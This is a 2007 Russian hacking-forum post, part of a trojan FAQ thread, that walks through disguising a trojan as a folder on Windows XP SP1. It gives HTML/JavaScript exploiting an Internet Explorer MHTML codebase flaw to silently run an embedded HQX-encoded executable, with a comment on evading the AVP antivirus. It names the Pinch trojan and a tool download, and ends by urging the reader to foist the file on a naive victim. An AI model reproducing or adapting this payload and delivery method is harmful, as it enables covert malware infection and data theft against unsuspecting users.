Тема: Faq по трою(как его сделать на http)
Показать сообщение отдельно

  #23  
Старый 04.09.2007, 20:13
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909

Репутация: 200
По умолчанию
Итак смертельный скрипт: (правда тема старая. Идея nsd):
Повторяю еще раз - сей трюк прокатит только на SP1.
Идея состоит вот в чем: если воспользоваться расширением .folder в SP1 то файл отображается как обыкновенная папка! При ее открытии специально подготовленный javascript (надо использовать бреш ослика) запускает тело троя! Причем на эту папку не гавкает антивирус.
Сейчас я подробно расскажу как это сделать...
Сперва создаем текстовый документ, назавем его photo.txt. Далее открываем его в текстовом редакторе и прописываем тэги:
<html>
</html>
Сохраняем. Теперь меняем рассширение файла с .txt на .folder и вуоля! Наш файл файл превращается в папку (в псевдопапку) Попробуем его открыть...О! открывается в IE.
Теперь необходимо подготовить javascript. Возвращаем нашему файлу былую форму-меняем расширение обратно на .txt и помещаем туда следующий скрипт:
<html>//уже прописан
MIME-Version: 1.0

Content-Location:trojan.exe

Content-Transfer-Encoding: mac-binhex40

//сюда мы поместим тело троя в HQX формате(чуть позже как это сделать...)

<title>|</title>
<body bgcolor=blue scroll=no>
<SCRIPT>
function zoh(){
z = document.URL;
p = z.substr(-0,z.lastIndexOf("\\"));
p = unescape(p)
document.write( '<title></title><body scroll=no bgcolor=#000000>

//здесь оставляем пару комментариев жертве на ваш выбор. Можно, например: Кердык тебе!!!!

<object classid="clsid:77777777-7777-7777-7777" codebase="mhtml:'+p+'\\1.folder!trojan.exe" width=1 height=1></object>');
}
// это для того, чтобы обмануть AVP

document.write('');
setTimeout("zoh()",0);
</script>
</html>
Все наш javascript готов! Теперь надо скомпилировать трой, к примеру Pinch v 1.0. Ну думаю тут проблем не будет, так как там на первых страницах уже все есть. Итак скомпилировали...(правда я не пробовал через http, делал через smtp).
Так...далее нам понадобиться утилита binhex, которую можно взять http//www.aladin88.jino-net.ru/tools/binhex.rar
Распаковываем и закидываем её в папку где лежит трой Pinch. Запускаем binhex выбираем нашего трояна (как вы его там назвали) и нажимаем F2. В результате получаем трояна в формате HQX. Открываем его в блокноте и копируем все содержимое (да эти непонятные символы!) и вставляем в скрипт(вместо коменнтария).
Теперь сожраняем и меняем расширение на .folder. Всё наше творение готово! Теперь с улыбкой впариваем его ламеру

---------------------------------------------
Плз, оцените статью
 
Ответить с цитированием